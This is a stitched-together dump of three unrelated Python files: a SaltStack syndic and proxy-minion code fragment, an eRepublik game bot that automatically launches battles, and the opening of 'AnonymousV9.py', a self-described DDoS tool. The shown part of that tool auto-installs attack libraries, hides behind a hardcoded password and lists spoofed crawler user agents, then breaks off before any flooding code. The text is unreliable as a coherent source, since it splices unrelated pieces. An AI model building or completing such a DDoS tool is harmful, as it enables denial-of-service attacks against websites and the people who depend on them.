future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
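# yield the requested (or first) master first, then fall back to the remaining masters in order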
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
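# in cluster mode, drop returns that originated from this same master; the mismatched
# defaults (0 vs 1) mean a load without a master_id is never treated as our own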
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
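# (jids are timestamp-derived strings, so sorting them lexicographically tracks creation time)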
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top-level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar into the opts for proxy %s: %s',
self.opts['id'], terr)
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# `proxy_keep_alive` defaults to True; setting it to False disables these reconnect attempts
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__)
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], (tuple, list)):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
battle_launcher.py
|
import threading
from datetime import timedelta
from erepublik import Citizen, utils
CONFIG = {
'email': '[email protected]',
'password': 'Pa$5w0rd!',
'interactive': True,
'fight': True,
'debug': True,
'start_battles': {
121672: {"auto_attack": False, "regions": [661]},
125530: {"auto_attack": False, "regions": [259]},
125226: {"auto_attack": True, "regions": [549]},
124559: {"auto_attack": True, "regions": [176]}
}
}
def _battle_launcher(player: Citizen):
"""Launch battles. Check every 5th minute (0,5,10...45,50,55) if any battle could be started on specified regions
and after launching wait for 90 minutes before starting next attack so that all battles aren't launched at the same
time. If player is allowed to fight, do 100 hits on the first round in players division.
:param player: Logged in Citizen instance
":type player: Citizen
"""
global CONFIG
finished_war_ids = set()
war_data = CONFIG.get('start_battles', {})
war_ids = {int(war_id) for war_id in war_data.keys()}
next_attack_time = player.now
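# round the anchor time down to the previous 5-minute boundary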
next_attack_time = next_attack_time.replace(minute=next_attack_time.minute // 5 * 5, second=0)
while not player.stop_threads.is_set():
try:
attacked = False
player.update_war_info()
running_wars = {b.war_id for b in player.all_battles.values()}
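# skip wars that are already finished or that currently have an active battle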
for war_id in war_ids - finished_war_ids - running_wars:
# CONFIG keys may be ints (as written above) or strings (e.g. when loaded from JSON); handle both
war = war_data.get(war_id, war_data.get(str(war_id), {}))
war_regions = set(war.get('regions'))
auto_attack = war.get('auto_attack')
status = player.get_war_status(war_id)
if status.get('ended', False):
CONFIG['start_battles'].pop(str(war_id), None)
finished_war_ids.add(war_id)
continue
elif not status.get('can_attack'):
continue
if auto_attack or (player.now.hour > 20 or player.now.hour < 2):
for reg in war_regions:
if attacked:
break
if reg in status.get('regions', {}).keys():
player.launch_attack(war_id, reg, status.get('regions', {}).get(reg))
attacked = True
hits = 100
if player.energy.food_fights >= hits and player.config.fight:
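# poll for up to ~2 minutes until the freshly launched battle shows up, then fight in it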
for _ in range(120):
player.update_war_info()
battle_id = player.get_war_status(war_id).get("battle_id")
if battle_id is not None and battle_id in player.all_battles:
player.fight(battle_id, player.details.citizenship, hits)
break
player.sleep(1)
if attacked:
break
if attacked:
break
war_ids -= finished_war_ids
if attacked:
next_attack_time = utils.good_timedelta(next_attack_time, timedelta(hours=1, minutes=30))
else:
next_attack_time = utils.good_timedelta(next_attack_time, timedelta(minutes=5))
player.stop_threads.wait(utils.get_sleep_seconds(next_attack_time))
except Exception:
player.report_error("Task error: start_battles")
def main():
player = Citizen(email=CONFIG['email'], password=CONFIG['password'], auto_login=False)
player.config.interactive = CONFIG['interactive']
player.config.fight = CONFIG['fight']
player.set_debug(CONFIG.get('debug', False))
player.login()
if CONFIG.get('start_battles'):
name = "{}-start_battles-{}".format(player.name, threading.active_count() - 1)
state_thread = threading.Thread(target=_battle_launcher, args=(player,), name=name)
state_thread.start()
if __name__ == "__main__":
main()
|
AnonymousV9.py
|
#import module
import os,sys
try:
import socks, requests, wget, cfscrape, urllib3
except:
if sys.platform.startswith("linux"):
os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
elif sys.platform.startswith("freebsd"):
os.system("pip3 install pysocks requests wget cfscrape urllib3 scapy")
else:
os.system("pip install pysocks requests wget cfscrape urllib3 scapy")
import random, socket, threading
import os, socket, threading, colorsys, time, random
import socket
import sys
import os
import time
import random
import threading
import base64 as b64
from types import MethodType
import string
import json
import sys
import signal
from os import system,name
os.system('color ' +random.choice(['B'])+ " & cls & UZI WATZEN DDOS [ Buka Password ]")
password = input("[ + ] Masukan Password Tools : ")
if password == "UziWatzen":
print("\033[1;32;37m Password Yang Anda Masukan Benar")
time.sleep(5)
else :
print("\033[1;32;37mPassword Yang Anda Masukan Salah")
time.sleep(100000000000000000000000000000)
useragents = [
"AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"TelegramBot (like TwitterBot)"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 TelegramBot (like TwitterBot)"
"Mozilla/5.0 (compatible; YandexAdNet/1.0; +http://yandex.com/bots)"
"Mozilla/5.0 (compatible; Cloudflare-Smart-Transit/1.0; +https://www.cloudflare.com/"
"Mozilla/5.0 (Linux; Android 5.0; SM-G920A) AppleWebKit (KHTML, like Gecko) Chrome Mobile Safari (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
"Googlebot/2.1 (+http://www.google.com/bot.html)" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)"
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
"Mozilla/5.0 (Slurp/cat; [email protected]; http://www.inktomi.com/slurp.html)"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/536.28.10 (KHTML, like Gecko) Version/6.0.3 Safari/536.28.10",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 (compatible; YandexScreenshotBot/3.0; +http://yandex.com/bots)"
"Mozilla/5.0 (compatible; Cloudflare-Smart-Transit/1.0; +https://www.cloudflare.com/",
"Mozilla/5.0 (compatible; CloudFlare-AlwaysOnline/1.0; +http://www.cloudflare.com/always-online) AppleWebKit/534.34",
"Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
" Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)",
"Mozilla/5.0 (Linux; U; Android 5.1; zh-cn; Build/LMY47D ) AppleWebKit/534.30 (KHTML,like Gecko) Version/4.0 Chrome/50.0.0.0 Mobile Safari/534.30 GIONEE-GN9010/GN9010 RV/5.0.16",
"Mozilla/5.0 (compatible; Google-Site-Verification/1.0)",
"Dalvik/1.6.0 (Linux; U; Android 4.4.2; GT-I9190 Build/KOT49H)",
"Mozilla/5.0 (Linux; Android 4.4.2; DEXP Ixion ES2 4.5 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 YaBrowser/14.5.1847.18432.00 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 6.0; zh-cn; Build/MRA58K ) AppleWebKit/534.30 (KHTML,like Gecko) Version/4.0 Chrome/50.0.0.0 Mobile Safari/534.30 GIONEE-S9/S9 RV/5.0.17",
"VK/28 CFNetwork/711.4.6 Darwin/14.0.0",
"Instagram 8.2.0 (iPhone4,1; iPhone OS 8_4; ru_RU; ru; scale=2.00; 640x960) AppleWebKit/420+",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36",
"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
"Mozilla/5.0 (compatible; vkShare; +vk.com/dev/Share)",
"Mozilla/5.0 (Windows Mobile 10; Android 8.0.0; Microsoft; Lumia 950XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Mobile Safari/537.36 Edge/80.0.361.62"
"Mozilla/5.0 (Linux; Android 5.1.1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Focus/2.3 Chrome/59.0.3071.125 Mobile Safari/537.36"
"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N)"
"Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.84 Safari/537.36 CrKey/1.21a.76178",
"Sogou head spider/3.0( http://www.sogou.com/docs/help/webmasters.htm#07)",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.99 Safari/537.36 Vivaldi/2.9.1705.41",
"Mozilla/5.0 (Linux; Android 9; STF-L09 Build/HUAWEISTF-L09; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.79 Mobile Safari/537.36 [Pinterest/Android]",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone9,1;FBMD/iPhone;FBSN/iOS;FBSV/13.3.1;FBSS/2;FBID/phone;FBLC/en_US;FBOP/5;FBCR/Verizon]",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/13.3;FBSS/2;FBID/phone;FBLC/en_US;FBOP/5;FBCR/AT&T]",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
"WeatherReport/1.2.1 CFNetwork/485.12.7 Darwin/10.4.0",
"WeatherReport/1.2.2 CFNetwork/485.12.7 Darwin/10.4.0",
"Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (Linux; Android 4.2.2; Philips S388 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Mobile Safari/537.36 OPR/34.0.2044.98679"
"Mozilla/5.0 (compatible; Discordbot/2.0; +https://discordapp.com)"
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)"
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
"APIs-Google (+https://developers.google.com/webmasters/APIs-Google.html)"
"Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36"
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16"
"Mozilla/5.0 (Linux; U; Android 2.3.1; en-us; MID Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; MID Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 [FB_IAB/FB4A;FBAV/56.0.0.23.68;]",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.137 Safari/537.36 OPR/67.0.3575.79"
"Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
"DuckDuckBot/1.0; (+http://duckduckgo.com/duckduckbot.html)"
"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Exabot-Thumbnails"
"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
"ia_archiver (+http://www.alexa.com/site/help/webmasters; [email protected])"
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/W.X.Y.Z‡ Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"Mozilla/5.0 (Linux; Android 8.1.0; motorola one Build/OPKS28.63-18-3; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 Instagram 72.0.0.21.98 Android (27/8.1.0; 320dpi; 720x1362; motorola; motorola one; deen_sprout; qcom; pt_BR; 132081645)"
"Googlebot/2.1 (+http://www.google.com/bot.html)"
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
